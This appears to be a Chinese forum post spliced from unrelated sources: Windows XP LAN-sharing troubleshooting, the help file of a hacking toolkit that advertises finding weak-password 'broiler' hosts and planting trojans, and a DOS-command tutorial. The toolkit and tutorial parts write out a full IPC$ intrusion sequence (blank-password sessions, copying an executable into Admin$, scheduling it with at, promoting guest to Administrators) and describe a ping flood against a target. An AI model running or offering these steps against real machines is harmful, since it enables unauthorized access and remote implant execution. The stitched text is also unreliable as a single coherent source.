一、启用guest来宾帐户；二、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里，“从网络访问此计算机”中加入guest帐户，而“拒绝从网络访问这台计算机”中删除guest帐户；三、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享（推荐）”前的勾；四、设置共享文件夹；五、控制面板→管理工具→本地安全策略→本地策略→安全选项里，把“网络访问：本地帐户的共享和安全模式”设为“仅来宾-本地用户以来宾的身份验证”（可选，此项设置可去除访问时要求输入密码的对话框，也可视情况设为“经典-本地用户以自己的身份验证”）；六、右击“我的电脑”→“属性”→“计算机名”，该选项卡中有没有出现你的局域网工作组名称，如“work”等。然后单击“网络 ID”按钮，开始“网络标识向导”：单击“下一步”，选择“本机是商业网络的一部分，用它连接到其他工作着的计算机”；单击“下一步”，选择“公司使用没有域的网络”；单击“下一步”按钮，然后输入你的局域网的工作组名，如“work”，再次单击“下一步”按钮，最后单击“完成”按钮完成设置。访问网上邻居时显示:" windows xp系统访问局域网时显示 "WORKGROUP无法访问．您可能没有权限使用网络资源．请与这台服务器的管理员联系以查明您是否有访问权限．此工作组的服务器的列表当前无法使用." 我用的是xp系统我也遇到过这样的情况，当时也是着急得不轻，后来看到了以下的内容，照着一步步的做了做，真的好了。内容不少，但是仍然希望你能耐住性子，仔细的看看自己属于那种情况，应该会有所收获。局域网互访 - [ 网络 ] 我也是类似问题。以前一个局域网10多台机子互访问。安了蕃茄花园v2.3，感觉主题漂亮，桌面壁纸自动换，很爽。访问局域网计算机没问题。可网内其它机子在工作组内能看到我的机子，但打不开。说什么“没有权限”。所有设置都作了如下改动（网上找的），依然无效，何故？但求高手指点。 “网上邻居”无法互访问题解决方法大全 “网上邻居”无法互访的问题实在是太常见了，无论在学校，网吧还是家里多台电脑联机，都有可能遇到网上邻居无法互访的故展。“网上邻居”无法访问的故障多种多样，总结起来基本上有下面的几个： 1，没有共享资源/共享服务未启用。症状：电脑与电脑间可以Ping通，但无法访问共享资源，在“计算机管理”中查看“本地共享”后会弹出“没有启动服务器服务”的错误对话框。解决：在控制面板－管理工具－服务中启动Server服务。并设置“启动类型”为“自动”。 2，IP设置有误。症状：双机之间无法互Ping，连接用的双绞线经过测试没有问题，没有安装防火墙。解决：检查两台电脑的IP是否处在同一网段，还有子掩码是否相同。 3，WINXP默认设置不正确。症状：从WIN98/2000/2003上无法访问另一台WINXP的机器。解决：在“控制面板”中的“用户帐户”启用Guest帐号。然后在运行中输入secpol.msc启动“本地安全策略”。本地策略 -> 用户权利指派，打开“从网络访问此计算机”，添加Guest帐户本地策略 -> 安全选项，禁止"帐户：使用空白密码的本地帐户只允许进行控制台登陆"。另外有时还会遇到另外一种情况：访问XP的时候，登录对话框中的用户名是灰的,始终是Guest用户，不能输入别的用户帐号。解决：本地策略 -> 安全选项 -> "网络访问：本地帐户的共享和安全模式"，修改为"经典-本地用户以自己的身份验证" 4，系统漏洞修补软件修改了安全策略。症状：在“网上邻居”中可以看到对方的计算机，但是访问共享时却提示“没有权限访问网络” 解决：在开始菜单运行中输入secpol.msc启动“本地安全策略”，本地策略 -> 用户权利分配，打开“拒绝从网络访问这台计算机”，删除guest用户。 5，防火墙规则。症状：安装了防火墙（包括WINXP系统自带的防火墙），出现无法Ping通，或者是访问共享资源的时候提示"XXX无法访问"、"您可能没有权限使用网络资源"、"请与这台服务器的管理员联系以查明您是否有访问权限"、"找不到网络路径"等类似的提示。解决：停止防火墙或者添加局域网的访问规则。 WINXP自带的防火墙：打开控制面板 -> 网络和Internet连接 -> Windows防火墙 -> 例外，勾选“文件和打印机共享”。 6，Win2000/XP与Win98互访症状：Ping命令可以通过，但无法在“网上邻居”中实现互访。解决：在WIN2000/XP系统中：控制面板 -> 管理工具 -> 计算机管理 -> 本地用户和组 -> 用户，在Guest帐户上点击鼠标右键，选择属性，在常规项里取消

::: 啊D网络工具包帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便] 3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!] 4. 查看隐藏共享 [查看远程计算机的全部共享，包括隐藏的共享也可以查看的到,查看共享更方便] 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!] 6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!] 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!] 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626] 4. 端口扫描 [使你更加了解对方主机端口的打开状况] 5. 网卡MAC [快速获取一个网段的用户名、工作组、对方的网卡MAC地址] 6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!] 7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!] 8. Ping [判断某IP是否和网络连接的好帮手!] 9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!] 10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!] 11. Finger [Finger能为你查询对方系统的用户信息!] 12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!] 13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!] 14. 常用修改 [反恶意网页修改,恢复系统设置等] 19. 查错误代号说明 [不知道51这个代号表示什么错误，查一查就知道了!] --------------------------------------------------------------------------------- 支持的系统:win98/WinMe/win2000/WinXP/WinNT 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 =================================== 关于 =================================== 制作人: 啊D QQ号码: 9269563 邮箱: paf@163.net 网址: http://d99.126.com 地址: 深圳市龙岗区坪山镇石井太阳村如果觉得本软件不错,请发一份电子信件, 表示对作者的支持！在使用中发现错误,请记下你的测试环境,告诉我!以便更好地解决问题,先谢! 注: 本软件为免费软件,对使用本软件产生的后果,由使用者承担! 本软件可随意转载,转载时请确保文件的完整!未经同意,请勿用于商业用途！ ================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义： -r 显示本机路由表的内容； -s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）； -n 以数字表格形式显示地址和端口； -a 显示所有主机的端口号。 ------------------------------------------------------------------ ================================================================= 更新 ================================================================= DTools 2.01 更新情况(2004.4.3) * 更新了过期问题。 * 加入公告板。 DTools 2.0 更新情况(2003.8.15) * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整！使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令，而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明"，想知道你的机子打开端口的说明，一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能，了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! * 在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!减少了复制、粘贴的工作量! DTools 1.01 更新情况(2003.4.20) * 增加了网卡MAC地址查看功能! * 增加了肉鸡(IPC$)查找功能! * 增加了木马(IPC$)种植! * 增加了读取NT用户列表功能! * 增加了Finger功能! * 增强了共享资源查找器的功能,在win2000下能查找 C$ D$ .. IPC$ ADMIN$ 等隐藏共享目录 * 修改了共享查找的介面 * 删除了密码查看功能 * 修正了在Win2000下不能运行的问题 * 修正了一些Bug * 介面作了少量改动! * 添加了"在桌面加入快捷方式"的功能! * 外置了端口说明!

常用的DOS命令一，ping 　　　　　它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车，。所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了（下同）。　　　　-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。　　　　-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。　　　　-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。　　　　说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。　　　　下面我们举个例子来说明一下具体用法。　　　　这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。　　（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）　　至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就*大家自己发挥了。 ===================================================== 　　　　二，nbtstat 　　　　该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。　　　　-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。　　　　-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。　　-n 列出本地机器的NETBIOS信息。　　　　当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。 ================================================== 　　　　三，netstat 　　这是一个用来查看网络状态的命令，操作简便功能强大。　　　　-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息，如图4。　　　　这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。　　-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。 =================================================== 四，tracert 　　跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。如图5。　　　　这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。 ==================================================　　　　五，net 　　　　这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?回车如图6。　　在这里，我们重点掌握几个入侵常用的子命令。　　　　net view 　　　　使用此命令查看远程主机的所以共享资源。命令格式为net view \IP。　　　　net use 　　把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: \IPsharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和 192.168.0.7建立IPC$连接（net use \IPIPC$ "password" /user:"name"），　　　　建立了IPC$连接后，呵呵，就可以上传文件了：copy nc.exe \192.168.0.7admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。　　　　net start 　　使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，如图9，成功启动了telnet服务。　　　　net stop 　　入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。　　　　net user 　　查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。　　1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。　　2，net user abcd /del，将用户名为abcd的用户删除。　　3，net user abcd /active:no，将用户名为abcd的用户禁用。　　4，net user abcd /active:yes，激活用户名为abcd的用户。　　5，net user abcd，查看用户名为abcd的用户的情况　　　　net localgroup 　　查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法：net localgroup groupname username /add。　　　　现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，呵呵，你可以再使用 net user abcd来查看他的状态。　　　　net time 　　这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一步入侵打好基础。用法：net time \IP。　 ========================================================= 　　六，at 　　　　这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command \computer。　　　　表示在6点55分时，让名称为a-01的计算机开启telnet服务（这里net start telnet即为开启telnet服务的命令）。 ================================================ 　　　七，ftp 　　　　大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。　　首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入“help”来查看帮助（任何DOS命令都可以使用此方法查看其帮助)。　　　　大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。　　　　首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例介绍。　　　　用户名和密码都是ftp，密码是不显示的。当提示**** logged in时，就说明登陆成功。这里因为是匿名登陆，所以用户显示为Anonymous。　　　　接下来就要介绍具体命令的使用方法了。　　　　dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。　　cd 进入某个文件夹。　　get 下载文件到本地机器。　　put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么利用就不多说了，大家就自由发挥去吧。　　delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。　　bye 退出当前连接。　　quit 同上。 =================================================== 　　八，telnet 　　功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help 查看其帮助信息。　　　　然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。　　　　当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。

6,849

社区成员

178,034

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章